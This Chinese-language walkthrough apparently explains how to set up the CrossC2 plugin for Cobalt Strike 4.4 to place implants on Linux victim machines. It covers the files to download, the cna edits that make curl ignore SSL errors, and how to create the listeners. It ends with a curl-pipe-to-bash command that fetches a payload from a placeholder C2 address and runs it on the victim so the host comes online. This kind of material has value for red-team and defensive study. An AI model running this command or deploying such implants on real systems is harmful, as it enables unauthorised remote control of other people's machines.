測(cè)試時(shí)版本基于 4.4，最近曝了CVE-2022-39197，需要把CS換成新版

0X01 準(zhǔn)備

1 文檔鏈接

https://github.com/gloxec/CrossC2/blob/cs4.1/README_zh_full.md

2 發(fā)布鏈接

https://github.com/gloxec/CrossC2/releases

3 環(huán)境

客戶端 Mac
服務(wù)端 Linux
受害段 Linux

0X02 下載文件

1 CS 插件腳本 [放在客戶端]

該文件下載完用于 CS 客戶端 加載插件

2 生成馬的程序 [放在客戶端]

生成馬是在客戶端生成的，不是服務(wù)端，和cna放在同一個(gè)文件夾
如果客戶端是mac，下載MacOS
如果客戶端是Linux，下載Linux
如果客戶端是windows，下載win.zip，解壓后放在cna同一個(gè)文件夾

3 CS服務(wù)端的.cobaltstrike.beacon_keys [放在客戶端]

下載回來和cna放在同個(gè)文件夾

0X03 修改cna配置修改 [客戶端修改]

1 生成木馬的命令修改

第一行為當(dāng)前文件的目錄
第二行為當(dāng)前客戶端的系統(tǒng)
這兩行的作用是生成木馬時(shí)，PATH + BIN 運(yùn)行程序

2 下載木馬的https的連接方式修改

后面生成木馬，生成獲取木馬的curl命令時(shí)，curl會(huì)因?yàn)閟sl無法正常獲取木馬
需要修改curl，加上 "-k "，跳過ssl報(bào)錯(cuò)

0X04 加載第三方插件腳本

打開腳本管理器界面，加載后會(huì)有CrossC2的選項(xiàng)

0X05 生成監(jiān)聽器

創(chuàng)建監(jiān)聽器

注意：
第一處：填寫 .cobaltstrike.beacon_keys的物理路徑，怕找不到
第二處：需要選擇基礎(chǔ)監(jiān)聽器，沒有基礎(chǔ)的就新建一個(gè)，需要是https的監(jiān)聽器
第三處：打鉤
地四處：因?yàn)槭?.4版本的，所以選4.4

生成后有兩個(gè)監(jiān)聽器，一個(gè)是基礎(chǔ)監(jiān)聽器，一個(gè)是CrossC2監(jiān)聽器

0X06 快捷生成命令

勾選Enable SSL后，復(fù)制粘貼命令，到linux機(jī)器上運(yùn)行[受害端]，就可以上線了

curl -A O -o- -L -k https://xxx.xxx.xxx.xxx:55413/a | bash -s

下篇：批量getshell與上線